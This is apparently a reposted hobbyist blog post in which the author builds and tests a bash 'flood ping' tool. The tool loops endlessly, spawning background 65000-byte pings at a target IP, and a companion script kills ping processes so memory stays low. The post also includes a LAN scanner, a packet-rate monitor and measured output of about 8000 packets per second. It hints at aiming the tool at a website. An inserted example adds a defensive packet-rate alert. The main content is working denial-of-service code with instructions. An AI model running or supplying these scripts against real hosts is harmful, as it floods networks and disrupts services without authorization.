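The title puts "flood ping" in quotation marks because back in my freshman year I played with flood-ping hacking software and never got it to work, and I have never been involved in developing this kind of software.
As I recall, flood ping has the following characteristics: the original flood ping could send request packets larger than 65500 bytes at a time; and it can send a large number of packets in a short time (in this experiment the "packets" reached about 8000 per second).
In other words, ping baidu.com -s 65000 is a legal ping.
So I wrote this script: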
myflood.sh
```bash
#!/bin/bash
function floodping(){
    while true
    do
        (ping $toping -s 65000 &> /dev/null;)&
    done
}
toping=$1;
floodping;
wait;
```
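Usage: $ bash myflood.sh ip (192.168.1.2)
How the script works:
while true: an infinite loop
..... &> /dev/null: sends the characters produced by the preceding command into /dev/null (the black hole);
()&: runs the commands inside () in the background
wait: waits for the child processes to finish
Purpose of the script: keep spawning ping processes to send packets (within the limits of memory)
First, test against an IP on the local network.
I wrote a script to detect IPs on the internal network: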
networks.sh
```bash
#!/bin/bash
network="192.168.1"
for sitenu in $(seq 1 100)
do
    (ping -c 1 -w 1 ${network}.${sitenu} &> /dev/null && echo ${network}.${sitenu} up || echo ${network}.${sitenu} down)&
done
wait
```
$ bash networks.sh | grep up
192.168.1.1 up
192.168.1.5 up
192.168.1.4 up
This experiment uses 192.168.1.1.
To keep memory from being used up, I wrote a script that kills the ping threads, killpings.sh
```bash
#!/bin/bash
function killps(){
    bbb="`pgrep $threadname`"   # no spaces around the = sign in a variable assignment
    [ -z "$bbb" ] && echo "$threadname is not running" && exit   # the double quotes keep spaces from splitting the value
    for i in $bbb
    do
        kill -9 $i
    done
    echo "$threadname is kill"
}
threadname='ping';
while true
do
    sleep 1;
    killps;
done
wait
```
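This way myflood.sh keeps spawning ping child processes while killpings.sh kills some of them, so memory is hardly consumed (only about 200MB of memory was used in the experiment).
Tools for viewing the experiment results:
nload eth0 to view the traffic.
ifconfig eth0 to view the number of request packets sent. Using this principle I wrote a script to monitor the packets (it monitors for 30 seconds, once per second).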
packagebc.sh
```bash
#!/bin/bash
for i in `seq 1 30`;
do
    firstgetvalue=$(ifconfig eth0 | tail -n 5 | tr -d -c '0-9 ' | tr ' ' '\n' | tr -s '\n' | sed -n '2,2p')
    firstoutvalue=$(ifconfig eth0 | tail -n 5 | tr -d -c '0-9 ' | tr ' ' '\n' | tr -s '\n' | sed -n '7,7p')
    sleep 1;
    secondgetvalue=$(ifconfig eth0 | tail -n 5 | tr -d -c '0-9 ' | tr ' ' '\n' | tr -s '\n' | sed -n '2,2p')
    secondoutvalue=$(ifconfig eth0 | tail -n 5 | tr -d -c '0-9 ' | tr ' ' '\n' | tr -s '\n' | sed -n '7,7p')
    echo "getvalue(s): " $(( secondgetvalue - firstgetvalue ))
    echo "outvalue(s): " $(( secondoutvalue - firstoutvalue ))
    echo -e ""
done
```
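The ifconfig pipeline in packagebc.sh depends on the exact line layout of legacy net-tools output. As an added example (not part of the original post), the same per-second packet deltas can be computed from /proc/net/dev-format text, with a check that flags a transmit rate above a limit; the function names, the two sample snapshots and the 5000 pps limit are constructed for illustration.

```bash
#!/bin/bash
# Added example: packet deltas from two /proc/net/dev-format snapshots.
# SNAP_T0 / SNAP_T1 are constructed sample data, "taken one second apart".
SNAP_T0='Inter-|   Receive                                                |  Transmit
 face |bytes    packets errs drop fifo frame compressed multicast|bytes    packets errs drop fifo colls carrier compressed
    lo:    4200      42    0    0    0     0          0         0     4200      42    0    0    0     0       0          0
  eth0:71000000    5000    0    0    0     0          0         0 90000000    9000    0    0    0     0       0          0'
SNAP_T1='Inter-|   Receive                                                |  Transmit
 face |bytes    packets errs drop fifo frame compressed multicast|bytes    packets errs drop fifo colls carrier compressed
    lo:    4200      42    0    0    0     0          0         0     4200      42    0    0    0     0       0          0
  eth0: 71400000    5264    0    0    0     0          0         0 626000000   17245    0    0    0     0       0          0'

# pkt_counters IFACE < snapshot : prints "RX_PACKETS TX_PACKETS", status 1 if IFACE is absent
pkt_counters() {
    awk -v ifc="$1" '
        { sub(/:/, " ") }                 # "eth0:123" and "eth0: 123" both occur
        $1 == ifc { print $3, $11; found = 1 }
        END { exit !found }
    '
}

# pkt_delta IFACE BEFORE AFTER : prints "RX_DELTA TX_DELTA"
pkt_delta() (
    a=$(printf '%s\n' "$2" | pkt_counters "$1") || exit 1
    b=$(printf '%s\n' "$3" | pkt_counters "$1") || exit 1
    set -- $a $b                          # $1 $2 = before rx tx, $3 $4 = after rx tx
    echo "$(( $3 - $1 )) $(( $4 - $2 ))"
)

# tx_flood_check IFACE BEFORE AFTER LIMIT : status 0 and an alert line when TX pps > LIMIT
tx_flood_check() (
    d=$(pkt_delta "$1" "$2" "$3") || exit 2
    tx=${d#* }
    [ "$tx" -gt "$4" ] || exit 1
    echo "ALERT $1 tx=${tx}pps limit=$4"
)

pkt_delta eth0 "$SNAP_T0" "$SNAP_T1"
```

On a live host, the two snapshots would be the contents of /proc/net/dev read one second apart.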
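This experiment uses 4 terminals.
Terminals for viewing the results (two):
one runs nload eth0
one runs bash packagebc.sh (this monitors the packets; to view memory, use the free command)
Terminals for running the scripts (the two must work together):
one runs the script bash killpings.sh (make sure this script is running when the myflood.sh script below is run)
one runs bash myflood.sh 192.168.1.1 (or bash myflood goo..g.com)
The data collected in this experiment: the memory usage during the experiment; the traffic change per second; the packets sent per second
Results during the experiment
Memory usage
Before the experiment there was 3335596kb; during the experiment about 200MB of memory was used (the memory used in this experiment varies: the effect of killpings.sh)
Traffic usage
The most important figure is the change in "request packets sent" per second (data monitored over 30 seconds); it can reach around 7500 to 8500 per second.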
getvalue(s): 0
outvalue(s): 8245
getvalue(s): 264
outvalue(s): 8348
getvalue(s): 176
outvalue(s): 8296
getvalue(s): 485
outvalue(s): 8028
getvalue(s): 277
outvalue(s): 8256
getvalue(s): 616
outvalue(s): 7984
getvalue(s): 132
outvalue(s): 8275
getvalue(s): 440
outvalue(s): 7965
getvalue(s): 132
outvalue(s): 8248
getvalue(s): 441
outvalue(s): 8009
getvalue(s): 265
outvalue(s): 8216
getvalue(s): 616
outvalue(s): 7486
getvalue(s): 221
outvalue(s): 8268
getvalue(s): 308
outvalue(s): 7446
getvalue(s): 178
outvalue(s): 8262
getvalue(s): 573
outvalue(s): 7664
getvalue(s): 308
outvalue(s): 8265
getvalue(s): 616
outvalue(s): 7788
getvalue(s): 221
outvalue(s): 8255
getvalue(s): 616
outvalue(s): 7810
getvalue(s): 247
outvalue(s): 8208
getvalue(s): 617
outvalue(s): 7576
getvalue(s): 177
outvalue(s): 8246
getvalue(s): 528
outvalue(s): 7493
getvalue(s): 176
outvalue(s): 8248
getvalue(s): 661
outvalue(s): 6856
getvalue(s): 221
outvalue(s): 8262
getvalue(s): 660
outvalue(s): 7528
getvalue(s): 396
outvalue(s): 8203
getvalue(s): 751
outvalue(s): 7746
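I will not run the experiment against a website here; I think the principle should be the same.
I am not sure whether this counts as flood ping in their sense; thanks to the professionals for their assessment.
This article is reposted from lilin9105's 51CTO blog. Original link: http://blog.51cto.com/7071976/1253225. To repost it, please contact the original author yourself.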